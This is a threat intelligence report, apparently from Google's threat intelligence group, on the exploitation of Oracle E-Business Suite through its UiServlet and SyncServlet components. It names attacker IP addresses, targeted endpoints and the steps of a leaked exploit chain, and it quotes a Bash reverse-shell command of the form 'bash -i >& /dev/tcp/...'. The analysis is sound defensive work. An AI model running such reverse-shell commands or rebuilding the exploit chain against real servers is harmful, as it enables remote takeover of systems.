
Technical Analysis: Deconstructing the Exploits
We have identified exploitation activity targeting Oracle E-Business Suite (EBS) servers occurring prior to the recent extortion campaign, likely dating back to July 2025.
Oracle released a patch on Oct. 4 for CVE-2025-61882, which referenced a leaked exploit chain targeting the UiServlet
component, but Mandiant has observed multiple different exploit chains involving Oracle EBS and it is likely that a different chain was the basis for the Oct. 2 advisory that originally suggested a known vulnerability was being exploited. It’s currently unclear which specific vulnerabilities/exploit chains correspond to CVE-2025-61882, however, GTIG assesses that Oracle EBS servers updated through the patch released on Oct. 4 are likely no longer vulnerable to known exploitation chains.
July 2025 Activity: Suspicious Activity Involving ‘UiServlet’
Mandiant incident responders identified activity in July 2025 targeting Oracle EBS servers where application logs suggested exploitation targeting /OA_HTML/configurator/UiServlet
. The artifacts recovered in Mandiant’s investigations do have some overlap with an exploit leaked in a Telegram group named “SCATTERED LAPSUS$ HUNTERS” on October 3rd, 2025. However, GTIG lacks sufficient evidence to directly correlate activity observed in July 2025 with use of this exploit. At this time, GTIG does not assess that actors associated with UNC6240 (aka “Shiny Hunters”) were involved in this exploitation activity.
-
The leaked exploit, as analyzed by watchTowr Labs, combines several distinct primitives including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection, to gain remote code execution on the target Oracle EBS server. As mentioned, it’s not clear which CVE corresponds to any of the vulnerabilities exploited in this chain. Any commands executed following exploitation would use
sh
on Linux, orcmd.exe
on Windows. -
The leaked exploit archive included sample invocations showing its use for executing a Bash reverse shell, with a command structured like
bash -i >& /dev/tcp/
./ 0>&1
Activity Observed Before July 2025 Patch Release
On July 10th, prior to the release of the July 2025 Oracle EBS security updates, Mandiant identified suspicious HTTP traffic from 200.107.207.26
. GTIG was unable to confirm the exact nature of this activity, but it’s plausible that this was an early attempt at exploitation of Oracle EBS servers. However, there was no available forensic evidence showing outbound HTTP traffic consistent with the remote XSL payload retrieval performed in the leaked exploit, nor any suspicious commands observed being executed, inhibiting us from assessing that this was an actual exploitation attempt.
Additionally, Internet scan data showed that server exposing a Python AIOHTTP server at approximately the same time as the aforementioned activity, which is consistent with use of the callback server in the publicly leaked exploit.
Activity Observed After July 2025 Patch Release
After the patches were released, Mandiant observed likely exploitation attempts from 161.97.99.49
against Oracle EBS servers, with HTTP requests for /OA_HTML/configurator/UiServlet
recorded. Notably, various logs involving EBS indicate that some of these requests timed out, suggesting the SSRF vulnerability present in the leaked public exploit, or follow-on activity that would’ve cleanly closed the request, may have failed. These errors were not observed in the activity recorded prior to the July 2025 patch release.
GTIG is not currently able to confirm if both of these sets of activity were conducted by the same threat actor or not.
August 2025 Activity: Exploit Chain Targeting ‘SyncServlet’
In August 2025, a threat actor began exploiting a vulnerability in the SyncServlet
component, allowing for unauthenticated remote code execution. This activity originated from multiple threat actor servers, including 200.107.207.26
, as observed in the aforementioned activity.
- Exploit Flow: The attack is initiated with a
POST
request to/OA_HTML/SyncServlet
. The actor then uses the XDO Template Manager functionality to create a new, malicious template within the EBS database. The final stage of the exploit is a request that triggers the payload via the Template Preview functionality. A request to the following endpoint is a high-fidelity indicator of compromise:
Source Credit: https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation/